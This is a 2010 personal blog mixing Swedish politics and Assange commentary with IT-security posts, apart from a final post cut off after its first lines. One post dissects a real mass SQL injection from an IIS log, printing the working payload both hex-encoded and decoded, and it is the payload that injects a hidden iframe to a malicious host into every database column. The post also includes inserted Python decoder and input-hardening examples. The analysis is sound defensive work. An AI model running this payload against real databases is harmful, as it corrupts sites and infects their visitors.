The future ain't what it used to be
As I've gotten older and hopefully somewhat wiser, the feeling of history repeating itself has grown stronger. I can't say that I know it all or have seen it all. Far from it. But I believe so much is lost when we fail to learn from history or even to take it into consideration. I often discuss my hopes and fears for the future as if they have already occurred, hence the name of this journal. Here you'll find my thoughts on politics, IT-security, technology and some personal musings.
Note: This authoring system is homegrown, so not all functions are written yet. Next up: commenting system.
(2010-08-23) So now what?
Looks like the charges against Mr Assange were dropped as soon as they appeared. I'm going to leave it at that for now. I hope it gets sorted out before the speculation gets out of hand. Or should I say MORE out of hand. Whatever the outcome, let's be sensible and rational about it. I hope that the cause of governmental transparency is not forgotten just because of this. I hope that it's not all just forgotten because some starlet forgets to wear her panties or a well known public figure says something mildly offensive.
I also hope that Pirat partiet can handle the negative publicity and does not lose its chance to upset the status quo.
Tags: Julian Assange
Posted 2010-08-23 by Erik Zalitis, changed 2010-08-23 by Erik Zalitis
(2010-08-21) More thoughts on Julian Assange
It's a few hours since I wrote my last post about the case against Mr Assange. I've thought a lot about it. It seems very suspicious and also very convenient for some people, but I recommend everyone to think carefully before accusing everyone from the CIA to the space aliens of this. Given how little we know about the circumstances of this trial, everything I say here is highly speculative. But surely Mr Assange must know how much he is under scrutiny, so it seems like a time when he should have been very careful about what he did. Maybe he thought himself above the law and that he could do whatever he wanted? But the feeling of being above it all does not make a person a rapist. It's all just very confusing.
If you want my guess, and mind you I know nothing more about this than you do, I don't think he did it. But if he did it, I think two things should happen:
- He must get a fair trial and a just sentence. Who he is means nothing and what he did means everything.
- It must mean nothing to our perception of his work and Wikileaks.
Whatever Julian turns out to be changes nothing about Wikileaks. Nothing at all. And it changes nothing about Pirat Partiet OR about the issues at hand.
Tags: Julian Assange, pirat partiet
Posted 2010-08-21 by Erik Zalitis, changed 2010-08-21 by Erik Zalitis
(2010-08-21) Julian Assange accused of rape
I usually try to steer clear of overly political topics in my posts. There are many people doing it much better than I do, so I leave it to them. But politics and IT-security are becoming more and more mixed together, so I feel the need to look at the whole picture here. It was today that the news of Julian Assange's pending arrest for rape reached me. It's just a mere week since I sat in a room with many other interested people and listened to Mr Assange speak about Wikileaks. A few days later "pirat partiet", a very libertarian party fighting against the new Big Brother society forming in Europe and Sweden, made a big deal out of their effort to host some of the "Wikileaks" servers here in Sweden. At the time, this looked like a good PR stunt, not to say a display of a will to fight for the cause.
Today, it might spell the end for the party. The elections of 2006 here in Sweden were the first time we saw a broad array of scandals being orchestrated to affect the outcome of the elections. A number of events were blown out of proportion and neither the right wing nor the left wing was above breaking a few scandals. It ranged from a misinterpreted piece of information that accused right wing party leader Fredrik Reinfeldt of being a pedophile to an evident attack on one of the Social Democrats' wireless networks carried out by people from "Folkpartiet".
This election, two "scandals" have already arisen around Piratpartiet. This might become the third one. It's painful to see, as I think Piratpartiet is the only party that stands opposed to the ever increasing surveillance society that the European Union is becoming. That said, I'm not a member of Piratpartiet, as there are many other issues where I disagree with them. If Mr Assange is guilty, let the court handle the punishment.
The issue of our society closing down and locking itself up, using the horrors of child porn and terrorism as a reason to ask for carte blanche to suspend the presumption of innocence, stands above all this.
Svenska Dagbladet (In Swedish):
http://www.svd.se/nyheter/inrikes/wikileaks-frontman-misstankt-for-valdtakt_5167469.svd
The Local (In English):
http://www.thelocal.se/28496/20100821/
Wikileaks denies being contacted by the Swedish police:
http://twitter.com/wikileaks/status/21731365419
Tags: Julian Assange, piratpartiet
Posted 2010-08-21 by Erik Zalitis, changed 2010-08-21 by Erik Zalitis
(2010-08-19) Update on the SQL-injection attack
It seems like ISC Sans, a favorite place of mine, has done pretty much the same job as I did. If you think my report was interesting, you should take a look at theirs. And here's some more data on the site (nemohuildiin.ru) referenced in the attack.
Tags: ISC Sans, SQL-Injection
Posted 2010-08-19 by Erik Zalitis, changed 2010-08-19 by Erik Zalitis
(2010-08-12) The ever changing world...
The security landscape is changing, and it is the soft issues that are in motion. When I started growing passionate about IT-security many years ago, I thought it was all about the technology. I fondly remember the time when people connected their systems directly to the Internet without firewalls and still seldom got hacked. I remember the first trickle of spam and the network attacks with fancy names like “smurf” and “teardrop”. Technology matters, but I feel that the main issues of today in IT-security are politics, social connections and feelings. After many years of being subjected to a mix of rational analysis and large doses of fear mongering, society is rapidly changing around the ubiquity of “always on” communication. The EU is enacting laws in a steady stream, the debate here in Sweden right now revolves around the question of whether some Manga cartoons are to be considered child porn, and of course we have the Wikileaks discussion. The overarching question: must we strive for freedom, safety or a mix of the two?
For me, the answer is clear: freedom does not mix well with too much "safety". I mean, safety is a state that you want to be in. Controlling risk is the road to safety. The problem is that total safety and freedom are mutually exclusive. And paranoid governments want to sell safety for the price of your freedom. That is: civil liberties take a hit. If you think this is fine, let me ask you this: do you trust your government to watch your back all the time to keep you safe? And, do you believe your government is impervious to corruption? In a perfect world, the government is set up primarily to protect itself. Protecting you is second to it protecting itself, since it sees itself as equivalent to all its people. This includes, but is not limited to, you. And that's as right as it gets. It has to work this way, but it's a sobering thought for anyone who believes that the best of intentions are good enough.
Am I paranoid? Well, you tell me, I'm only living here. I don't think the government is out to get me. My neighbors are much more likely to do something like that. But it's all about keeping government intrusions to a minimum. Police and security services must function, but do they really need to preempt us? I think Great Britain is a good example of what happens when well-meaning people go too far.
So what, should criminals just roam freely? No, that's not my message. Laws are not set up to protect people. They're set up to punish those that hurt others. Deterrence may work, but only for people that are undecided. Real criminals do not expect to get caught. That's why capital punishment does not work! The deterrent effect of most laws works, but only for honest people and often even for those undetermined. So let's keep it there and let the police go no further than keeping those suspected of a crime under surveillance.
Now is probably a good time to get interested in politics. Safety, security and privacy issues are all up in the air and what happens now will for better and worse define our society for years to come. If you live here in Sweden, don’t forget to vote!
Tags: Politics, IT-Security
Posted 2010-08-12 by Erik Zalitis, changed 2010-08-12 by Erik Zalitis
(2010-08-09) De-mystifying an SQL-injection
I’ve written a lot about security and politics lately, but I’m a technician at heart, so I think it’s time to dig into security from a technical standpoint. So today, let’s take one of the many SQL-injection attacks out there on the Internet and pick it apart. The code has been URL-encoded, so it cannot harm your web browser. Had that not been the case, it would have been too late anyway.
A few words of warning
The attack is a very real and fully functional attack that you must not put into an SQL editor connected to a database server and “run just to test”. It may actually work and then, congratulations, you’re in deep trouble. Infecting your own database server running as a virtual machine on a private network is probably just fine, as long as you treat it with a flame thrower afterwards. Remember, it’s like having your own vial with a frozen Ebola virus. It will be fun until it spreads. Ok, let’s be fair, this attack is not a virus or even a worm. It is the effect of a worm or, more likely, a program scanning all the subnets it can find. The difference between the two is that the worm spreads and attacks from servers it has conquered. But I digress…
The semi fictitious scenario
You get an alert from someone claiming to see something weird in the log of a Microsoft IIS server and they believe you’re the expert on the matter. So you log on to the server, but have no idea where to look. The person who alerted you has no idea which log it was and only a vague idea as to when.
This might seem hopeless, but a bit of deductive logic goes a long way. When you open the IIS manager console, you note that all websites store their logs under d:\wwwlogs. So you use the built-in search function to search through all *.log files created during the last week for … Yeah, for what? Good question. This could be tricky, but there has to be something that sticks out in an attack. Searching for ‘ and SELECT does nothing. This is weird, you think. But recently you read something about hackers using CAST and VARCHAR. You type that into the search box and restart the search.
Good news: Bingo, you got a hit from the logs.
Bad news: It looks like this:
2010-08-10 15:17:49 192.168.13.13 GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;DecLArE%20@s%20VarCHAR(4000);SET%20@S=CASt(0X6465434C417245204054205661526368417228323535292C40632056417243
6861522832353529204445436C615245205441426C655F637552734F5220637572736F5220664F
522053656C45637420612E4E414D452C622E6E414D452046524F4D207379734F626A6543747320
612C735973434F4C754D6E73206220774865726520612E49643D422E496420616E6420612E7874
7970653D27552720616E642028422E78747950653D3939206F5220622E78547970653D3335206F
5220422E78747970653D323331206F7220422E78547970453D31363729204F70656E205461624C
455F635552734F52206645544348206E4578542046726F4D205461626C455F637552736F722049
6E744F2040742C4063205768494C6528404066455443685F7374617455733D302920426547696E
20457845632827757044617465205B272B40742B275D20536554205B272B40632B275D3D727472
696D28634F4E5665727428766152634861522834303030292C5B272B40632B275D29292B634173
742830583343363936363732363136443635323037333732363333443232363837343734373033
413246324636453635364436463638373536393643363436393639364532453732373532463734
363437333246363736463245373036383730334637333639363433443331323232303737363936
343734363833443232333032323230363836353639363736383734334432323330323232303733
373437393643363533443232363436393733373036433631373933413645364636453635323233
453343324636393636373236313644363533452041732056615243684152283130362929272920
4665744348204E4558742046724F6D205461624C455F635572734F7220694E744F2040542C4063
20456E6420436C6F7345205461626C455F435552736F72204445614C4C4F63615445205461424C
655F437572734F5220%20aS%20VARcHar(4000));eXEc(@s);-- 80 - 666.666.666.666 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 200
Fantastic. What in the Sam Hill are we looking for here? A part of the log entry makes sense, though.
2010-08-10 15:17:49 192.168.13.13 GET /company/login.asp subPage=form.asp&nr=2&
Someone tried to access the login-script on one of the web sites. You use the directory name the log was created under to figure out which site it is. It’s called W3C1. The IIS manager tells you that this site hosts the web application called MuchoSell under www.ericade.net. So it must be http://www.ericade.net/muchosell/login.asp.
The tail end of the log entry also makes sense:
80 - 666.666.666.666 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 200
The attack was against port 80 (standard for web sites), it came from 666.666.666.666 and it claimed to use Internet Explorer 7. It also got an HTTP code 200 back. That means the transaction executed successfully. Is that good or bad in this case?
You probably know that 666.666.666.666 is an impossible IP address. It’s like those 1-555- telephone numbers you see in Hollywood movies.
But the rest of the code, what is it good for? It really looks kind of useless. Does it even mean something? Yes, it does. A bit of history: the intrusion detection systems that many organizations use can detect SQL statements sent as parameters in URLs. This is bad news for the cracker, and hence the need for obfuscation. The SQL server actually decodes the weird characters and then interprets them. So if that’s possible, shouldn’t we be able to do the same? The answer is of course yes.
The text is not encrypted; it’s just encoded as hexadecimal characters. We need a tool to decode it. Your weapon of choice is “ASCII Hex URL Decoder”, available from http://urldecoder.codeplex.com/. But when you try pasting the text into the program you get an error message stating that “the code must be wrapped in a CAST” statement. CAST is not what you ended up with on your leg after that horrible ski trip. It’s actually a Transact-SQL statement telling SQL that it should convert one format into another, in this case hex code into varchar. Varchar is a text string, so the CAST statement must decode the hex to make it a varchar. After changing the mixed case text to read CAST(0x6 … VARCHAR(4000)) the decoding works and you end up with:
deCLArE @T VaRchAr(255),@c VArChaR(255) DEClaRE TABle_cuRsOR cursoR fOR SelEct a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b wHere a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167) Open TabLE_cURsOR fETCH nExT FroM TablE_cuRsor IntO @t,@c WhILe(@@fETCh_statUs=0) BeGin ExEc('upDate ['+@t+'] SeT ['+@c+']=rtrim(cONVert(vaRcHaR(4000),['+@c+']))+cAst(0X3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6
469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865
696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D6
53E As VaRChAR(106))') FetCH NEXt FrOm TabLE_cUrsOr iNtO @T,@c End ClosE TablE_CURsor DEaLLOcaTE TaBLe_CursOR
But wait, what’s in the middle of that text? Another set of hex-coded stuff? Yup, hackers love double encoding their attack code to subvert security scanners.
Running the remaining hex code through the decoder yields:
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
And put all together, you get this:
2010-08-10 15:17:49 192.168.13.13 GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;DecLArE%20@s%20VarCHAR(4000);SET%20@S=deCLArE @T VaRchAr(255),@c VArChaR(255) DEClaRE TABle_cuRsOR cursoR fOR SelEct a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b wHere a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167) Open TabLE_cURsOR fETCH nExT FroM TablE_cuRsor IntO @t,@c WhILe(@@fETCh_statUs=0) BeGin ExEc('upDate ['+@t+'] SeT ['+@c+']=rtrim(cONVert(vaRcHaR(4000),['+@c+']))+<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>') FetCH NEXt FrOm TabLE_cUrsOr iNtO @T,@c End ClosE TablE_CURsor DEaLLOcaTE TaBLe_CursOR;eXEc(@s);-- 80 - 666.666.666.666 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 200
You fix the mixed case characters and the final code is:
GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;DECLARE @s VARCHAR(4000);SET @S=DECLARE @T VARCHAR(255),@c VARCHAR(255) DECLARE TABLE_CURSOR CURSOR fOR SELECT a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b WHERE a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167) OPEN TABLE_CURSOR FETCH NEXT FROM TABLE_CURSOR INTO @t,@c WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@t+'] SET ['+@c+']=rtrim(CONVERT(VARCHAR(4000),['+@c+']))+<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>') FETCH NEXT FROM TABLE_CURSOR INTO @T,@c END CLOSE TABLE_CURSOR DEALLOCATE TABLE_CURSOR;EXEC(@s);--
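The three manual steps above (grep the IIS log for CAST and VARCHAR, URL-decode the hit, peel both hex layers) can be scripted. The Python below is an added example, not part of the original post and not the decoder tool it mentions; the log lines, the field order, the placeholder domain malicious.example and the client address 203.0.113.7 are constructed for the demo.

```python
"""Decode a hex-CAST SQL injection from an IIS W3C log line (added example)."""
import re
import urllib.parse

# The obfuscation the post walks through: CAST(0x<hex> AS VARCHAR(n)) typed in
# random case. IGNORECASE covers the mixed case and the "0X" prefix alike.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9a-fA-F]+)\s+AS\s+VARCHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)

# Field order of the constructed lines below. A real log states its order in the
# "#Fields:" header at the top of the file, so check that before parsing.
IIS_FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
              "s_port", "username", "c_ip", "user_agent", "status"]


def decode_hex_literal(hex_digits):
    """Turn a T-SQL 0x literal into the text CAST(... AS VARCHAR) would produce."""
    if len(hex_digits) % 2:
        raise ValueError("odd number of hex digits: the log line is probably truncated")
    return bytes.fromhex(hex_digits).decode("latin-1")


def peel_casts(sql, max_depth=4):
    """Replace every CAST(0x.. AS VARCHAR(n)) with its decoded text and repeat,
    because the payload is double encoded. Returns (plain_sql, layers_removed)."""
    layers = 0
    while layers < max_depth:
        decoded = CAST_RE.sub(lambda m: decode_hex_literal(m.group(1)), sql)
        if decoded == sql:
            break
        sql, layers = decoded, layers + 1
    return sql, layers


def parse_iis_line(line):
    """Split one W3C log line into a dict; IIS never logs a raw space inside a field."""
    parts = line.rstrip("\n").split(" ")
    if len(parts) != len(IIS_FIELDS):
        raise ValueError("unexpected field count %d" % len(parts))
    return dict(zip(IIS_FIELDS, parts))


def analyse_line(line):
    """Return a finding for a line whose query carries a hex CAST, else None."""
    record = parse_iis_line(line)
    query = urllib.parse.unquote(record["uri_query"])  # %20 -> space, as in the post
    if not CAST_RE.search(query):
        return None
    plain, layers = peel_casts(query)
    return {
        "uri": record["uri_stem"],
        "client": record["c_ip"],
        "status": record["status"],  # a 200 says nothing about success, see the text
        "layers": layers,
        "decoded": plain,
        "iframes": re.findall(r"<iframe[^>]*>", plain, re.IGNORECASE),
    }


# --- constructed sample data (not taken from a real log) ----------------------
def cast_literal(text, width):
    """Hex-encode text as CAST(0x.. AS VARCHAR(width)); used only to build the sample."""
    return "CAST(0x%s AS VARCHAR(%d))" % (text.encode("latin-1").hex().upper(), width)


INNER = '<iframe src="http://malicious.example/go.php" width="0" height="0"></iframe>'
STAGE2 = ("DECLARE @T VARCHAR(255) SELECT @T='pages' "
          "EXEC('UPDATE ['+@T+'] SET body=body+" + cast_literal(INNER, len(INNER)) + "')")
QUERY = ("subPage=form.asp&nr=2&subLink=2;DECLARE @s VARCHAR(4000);SET @s="
         + cast_literal(STAGE2, 4000) + ";EXEC(@s);--")
SAMPLE_LINE = ("2010-08-10 15:17:49 192.168.13.13 GET /muchosell/login.asp "
               + urllib.parse.quote(QUERY, safe="=&;()@")
               + " 80 - 203.0.113.7 Mozilla/4.0+(compatible;+MSIE+7.0) 200")
BENIGN_LINE = ("2010-08-10 15:18:02 192.168.13.13 GET /muchosell/login.asp "
               "subPage=form.asp&nr=2&subLink=2 80 - 203.0.113.8 "
               "Mozilla/4.0+(compatible;+MSIE+7.0) 200")

if __name__ == "__main__":
    for line in (SAMPLE_LINE, BENIGN_LINE):
        finding = analyse_line(line)
        print("clean" if finding is None else finding)
```

Run over a whole log file, one line per `analyse_line` call, the "layers" count and the decoded statement are what you would paste into the report instead of the hex blob.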
Sweet! But what does it do, and did it work?
Now this is where it gets tricky. I’ll try to pick it apart for you.
GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;
This is the start of the GET request that normally comes from a web browser, but in this case it’s from the attack program instead. It requests that the web server run login.asp with three parameters: subPage, nr and subLink. The attack starts with subLink. The attack program has somehow figured out that subLink expects a number. It could have done that by looking at the links on the site that use those parameters. So it does not use the standard apostrophe to break out of the SQL statement, since it’s likely not used in the code. Remember that SELECT * FROM table WHERE id=2 is valid for numerical values, whereas SELECT * FROM table WHERE name=’Erik’ requires apostrophes. This is also why escaping apostrophes does not fix all security holes, since apostrophes are not used with numbers. Damn!
Then it continues by adding 2;DecLArE%20@s%20VarCHAR(4000);SET%20@S=CASt (…) to the parameter. It obviously expects this to go through unhindered to the database layer. And %20 is just URL encoding for white space. Let’s rip it apart.
2;
The innocent 2 and a semi-colon which means “end of statement.”
DecLArE @s VarCHAR(4000);
This part declares a variable called s as a VARCHAR holding up to 4000 characters of readable text.
SET @S=CASt(
This part sets “s” as the result of running cast on the long stream of hex coded gibberish. The result fed into s is clear text, since it has been decoded. When done, s is set to:
deCLArE @T VaRchAr ( … blah blah blah …) TaBLe_CursOR
Quite interesting stuff in that s-variable, no? Yeah, my interests are a bit weird, I know…
;EXEC(@s);--
And the grand finale: run whatever you put into the s-variable on the SQL server.
Ok, that begs the question, what does the code stored in “s” do? We have to pick that apart too. Got a headache yet? Good! Here’s what was decoded and put into s:
deCLArE @T VaRchAr(255),
The variable T is a string of characters with up to 255 characters.
@c VArChaR(255)
The variable c is another string of characters with up to 255 characters.
DEClaRE TABle_cuRsOR cursoR fOR SelEct a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b wHere a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167)
This statement is geared towards a Microsoft SQL server and tries to get a list of all tables and their fields for tables that are user-created. It does not specify a database, so the statement uses whatever database the database user has set as their default. The result is presented as a cursor called TABLE_CURSOR. A cursor is a mechanism to manipulate a data set. TABLE_CURSOR makes the names of the aforementioned tables and fields available. This is the list of targets in the database that the script will inject the code into.
Open TabLE_cURsOR
Once created, the cursor is opened.
fETCH nExT FroM TablE_cuRsor IntO @t,@c WhILe(@@fETCh_statUs=0)
It then feeds the data into the variables t and c and iterates through the statements below until it runs out of data. T is the table and c is the column (field). The statement iterates through all fields in all tables.
BeGin
Begin starts a block of statements belonging together.
ExEc('upDate ['+@t+'] SeT ['+@c+']=rtrim(cONVert(vaRcHaR(4000),['+@c+']))+cAst(0X3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6
469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865
696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D6
53E As VaRChAR(106))')
Exec runs an update on all rows changing the data under the column specified in @c in the table specified in @t. The "rtrim(cONVert(vaRcHaR(4000),['+@c+']))" part makes sure that the already present data is retained and the data it then tries to add is decoded as “<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>”.
FetCH NEXt FrOm TabLE_cUrsOr iNtO @T,@c
Gets the next victim from the list and feeds into the variables T and c.
End
Ends the statements. Now it iterates through everything between BEGIN and END again, if there’s anything left to get with TABLE_CURSOR.
When the run through of TABLE_CURSOR is done, it’s closed.
ClosE TablE_CURsor
Closing the cursor.
DEaLLOcaTE TaBLe_CursOR
Nice of it to actually clean up after trashing the place.
So in short, it feeds the iframe code into every column of every row it can get its hands on. Oh, the humanity!
That’s all good and fine, but did the attack succeed? Nothing so far gives us any information. Sorry, there are no good clues in this log. Or are there? The code references “sysObjects” and “sysColumns”, which only exist in Microsoft SQL server. It also uses semi-colons, which makes sure it will never work on a MySQL-based server. If you know that the SQL backend is running anything other than Microsoft SQL, this particular code will most likely not work at all.
That is a good start. But you must be sure, so you connect directly to the SQL server and go through the tables in the database that the web application uses. If the attack was successful, most fields would be filled with the <iframe> code.
But you’re not satisfied, so you download Firebug to your Firefox browser and make sure both are patched to the latest version. You also run them on a virtual machine that is set up with a non-persistent disk to prevent the infection from surviving a reboot. Then you surf to the site and use Firebug to go through the code, searching for the pesky <iframe>.
If all those three things show no evidence of a successful attack, you’re probably in the clear. I said “probably”. Good. Next up for you is a cup of coffee and a chat with the developers.
The attack works the same way some burglars try to open every door on every house in a neighborhood. If the door does not open, they try the next one. There are often people forgetting to lock their doors when they get home. And there are many web servers not properly secured.
What must be done to secure a web application depends on how the application is built, but there are a few general rules:
Input must be cleaned and preferably checked. A parameter expecting a number must not accept anything else. All input data must have a maximum and a minimum size. Everything that does not fit the constraints must be stripped or discarded.
The web application must not have more permissions or privileges than it needs. E.g. does it really need exec-privileges?
The code must not echo error messages from the database layer. Create a connection object and verify if it returns an error. In that case, print a generic error like “The application has experienced a problem and your request could not be completed. Please call your system administrator.”
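What the three rules look like in a request handler for the login script above, as an added example in Python (not the MuchoSell application's own code); an in-memory SQLite table stands in for the SQL server, and the table layout, the numeric bounds and the subPage allow-list are assumptions made for the demo.

```python
"""Hardened handling of login.asp's parameters (added example, not the app's code)."""
import logging
import re
import sqlite3

log = logging.getLogger("muchosell")

GENERIC_ERROR = ("The application has experienced a problem and your request could "
                 "not be completed. Please call your system administrator.")

# Rule 1: numeric parameters take digits only, within a minimum and a maximum.
# The bounds and the allow-list are assumptions for this demo.
INT_PARAMS = {"nr": (1, 999), "subLink": (1, 999)}
PLAIN_INT = re.compile(r"[0-9]{1,6}")          # no sign, space, ';' or 0x prefix
ALLOWED_SUBPAGES = {"form.asp", "help.asp"}    # allow-list instead of free text


def parse_int_param(params, name):
    """Return params[name] as a bounded int, or raise ValueError saying why."""
    raw = params.get(name, "")
    if not PLAIN_INT.fullmatch(raw):
        raise ValueError("%s is not a plain integer" % name)
    value = int(raw)
    low, high = INT_PARAMS[name]
    if not low <= value <= high:
        raise ValueError("%s out of range" % name)
    return value


def validate(params):
    """Check every parameter before anything touches the database."""
    sub_page = params.get("subPage", "")
    if sub_page not in ALLOWED_SUBPAGES:
        raise ValueError("subPage not allowed")
    return sub_page, parse_int_param(params, "nr"), parse_int_param(params, "subLink")


def lookup_link(conn, sub_page, nr, sub_link):
    """Values travel as bound parameters, never as SQL text, so a stacked
    '2;DECLARE ...' could not run even if validation were bypassed.
    Rule 2 lives outside this code: the account the application connects with
    should hold SELECT on its own tables only, not EXEC or UPDATE on everything."""
    row = conn.execute(
        "SELECT target FROM links WHERE sub_page = ? AND nr = ? AND sub_link = ?",
        (sub_page, nr, sub_link),
    ).fetchone()
    return row[0] if row else None


def handle_login_request(conn, params):
    """Return (http_status, body). Rule 3: the driver's error text goes to the
    server log; the client only ever sees the generic message."""
    try:
        sub_page, nr, sub_link = validate(params)
    except ValueError as exc:
        log.warning("rejected input %r: %s", params, exc)
        return 400, "Bad request"
    try:
        target = lookup_link(conn, sub_page, nr, sub_link)
    except sqlite3.Error as exc:
        log.error("database error for %r: %s", params, exc)
        return 500, GENERIC_ERROR
    if target is None:
        return 404, "No such page"
    return 200, "Redirecting to %s" % target


def demo_db(create_table=True):
    """Constructed in-memory stand-in for the application's database.
    create_table=False simulates a broken backend to exercise the error path."""
    conn = sqlite3.connect(":memory:")
    if create_table:
        conn.execute("CREATE TABLE links (sub_page TEXT, nr INTEGER, sub_link INTEGER, target TEXT)")
        conn.execute("INSERT INTO links VALUES ('form.asp', 2, 2, '/muchosell/form.asp?step=2')")
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(handle_login_request(db, {"subPage": "form.asp", "nr": "2", "subLink": "2"}))
    print(handle_login_request(db, {"subPage": "form.asp", "nr": "2",
                                    "subLink": "2;DECLARE @s VARCHAR(4000);--"}))
```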
At the end of the day you hopefully get to write a report stating that you sound the “all clear” but recommend a code review and a security analysis. On a very sensitive system, you might want to suggest that the manager contact a company specializing in penetration testing.
Tags: SQL injections, code analysis, best practice
Posted 2010-08-09 by Erik Zalitis, changed 2010-08-12 by Erik Zalitis
(2010-08-03) "The report of Internet's death was an exaggeration"
So what’s up in the security world? Right now it’s business as usual with few new wide-spread attacks. But when it comes to blended mixtures of old attacks, there’s really no slowdown to be seen. During the month of October 2009, we saw a global surge in spam, but I doubt people cared too much about it. It seems to me that the Internet works a bit like the human body. There is always something that the immune defense system has to attack and destroy. We only feel sick when the fight isn’t going so well. When I originally wrote this text in October of 2009, my left ear was under attack by evil bacteria and I had a mild fever. A few days later I was right as rain, so it obviously didn't kill me. The same is true about the Internet, when it gets “sick”. A few years ago, a prominent doomsayer wrote that the Internet would fail in 2006. Needless to say, it didn’t happen. In 2008 an all out attack on the root DNS servers was unsuccessful and the people betting on the death of the Internet have their eyes set on 2012. Would it be pretentious of me to laugh at them in advance, you think?
“There's always an Arquillian Battle Cruiser, or a Corillian Death Ray, or an intergalactic plague that is about to wipe out all life on this miserable little planet, and the only way these people can get on with their happy lives is that they Do... Not... Know about it!”
- K, ”Men in black”
Oh, by the way, the headline is a reference to Mark Twain's famous quote "The report of my death was an exaggeration". In Mr. Twain's case it's not a rumor anymore, but the Internet should still be alive when you read this text on it.
Tags: Philosophy, Mark Twain
Posted 2010-08-03 by Erik Zalitis, changed 2010-08-04 by Erik Zalitis
(2010-08-02) Attack of the killer shortcuts (From outer Redmond)
I know. It’s a week too early for the monthly Microsoft patches but taxes, death and zero day exploits wait for nobody. Today it’s the third one that is lurking. Microsoft will release a bulletin with an associated security patch in the evening. (Update: it's now available as MS10-046.) This security patch fixes all supported operating systems.
Supported means that if you’re using Windows XP Service Pack 2 or lower or Windows 2003 Service Pack 1 or lower, you’re out of luck. If you use any version of Windows 2000 you’re in even more trouble, since the whole operating system is considered obsolete. This is important to understand, since the vulnerability affects all Windows operating systems from 2000 up to and including Windows 7.
HOW DOES IT WORK?
In short: when you open a folder containing a shortcut pointing to a malicious file, you automatically "get your computer hacked".
The base problem has to do with the icon associated with a shortcut. A shortcut, you say? Yes, the normal shortcut file with its .lnk extension. It is in reality called a “shell link”, but most people know it as the nifty function they use to create a link to a file from their desktop. Normally when you create a shortcut, the icon for it is, if present, taken from the file that the shortcut leads to. You can of course pick your own custom icon.
The Windows shell does not check that the icon is a proper image before using it, which can be used to execute code through malformed code posing as an icon. The malicious code resides in the file the shortcut points to, so the exploit is likely to be an executable file and a shortcut file pointing to it. The bad news here is that just opening a folder with an “evil shortcut” inside it in Windows Explorer is enough to run the code. This is because most file listing dialog boxes and Windows Explorer itself display the associated icon of a shortcut. And those icons are automatically loaded when you open the folder.
HOW CAN THIS BE USED AGAINST A COMPUTER?
Malicious shortcuts can be put on a USB drive and used to attack a Windows PC with a logged-in user. This attack works well with network drives and can even work by fooling a user into surfing to a malicious site.
Please note that you only have to display the shortcut in Windows Explorer or any other application that tries to load the icon to be at risk.
Servers are less of a problem here since no sane administrator would use the server as a workstation. At least I hope so. Citrix servers pose a bigger problem. Hopefully most Citrix servers disallow users from doing potentially dangerous things like surfing the Internet or opening Windows Explorer. But the common file dialog box can also display icons, so you could probably get hurt by using the “Open files” function and browsing to a folder containing a malicious shortcut.
Clients are at a much higher risk, since browsing folders is a very common task for most users.
The official bulletin from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
The official advisory from Microsoft:
http://www.microsoft.com/technet/security/advisory/2286198.mspx
ISC Sans:
http://isc.sans.edu/diary.html?storyid=9304
Tags: Microsoft Security, Out of band, MS10-046, KB2286198, zero day exploit
Posted 2010-08-02 by Erik Zalitis, changed 2010-08-03 by Erik Zalitis
(2010-07-15) Bruce Schneier on privacy
I don't know if any of you read Bruce Schneier's excellent security newsletter. But in the issue that came out in April 2010, Bruce has this to say about privacy: "(...) you've got a whole lot of tech CEOs proclaiming the death of privacy -- especially when it comes to young people.
It's just not true. People, including the younger generation, still care about privacy. Yes, they're far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. (...)
Here's the problem: The very companies whose CEOs eulogize privacy make their money by controlling vast amounts of their users' information. "
Now this is a bit unexpected to hear from Mr. Schneier. I like his reasoning, but I believe he is a bit too optimistic about the general knowledge of privacy among most people. When you hear about privacy, the discussion is always about governments spying on the people they should protect and respect. This is indeed a serious issue, but far fewer worry about corporations gathering your personal data. And almost no one fears the issue of ordinary people spying on and collecting information about other ordinary people.
What gives?
Tags: Bruce Schneier, Privacy
Posted 2010-07-15 by Erik Zalitis, changed 2010-07-15 by Erik Zalitis
(2010-07-14) It’s just not fair!

You may think of them as super-geniuses doing the impossible, villains bringing the Internet to its knees or heroes “sticking it to the man”.
